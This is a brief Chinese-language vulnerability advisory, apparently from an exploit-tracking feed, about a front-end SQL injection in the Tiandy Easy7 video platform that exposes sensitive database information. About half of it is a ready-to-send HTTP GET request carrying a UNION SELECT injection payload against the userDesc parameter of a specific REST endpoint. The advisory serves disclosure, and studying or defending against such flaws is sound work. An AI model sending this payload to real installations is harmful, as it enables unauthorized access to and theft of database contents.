Description
天地伟业Easy7平台存在前台SQL注入漏洞,攻击者可获取数据库敏感信息。
天地伟业Easy7平台存在前台SQL注入漏洞,攻击者可获取数据库敏感信息。
GET /Easy7/rest/user/queryUserbyDesc?userDesc=1'+UNION+ALL+SELECT+CONCAT(0x7e,USER(),0x7e),41,41--+- HTTP/1.1
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.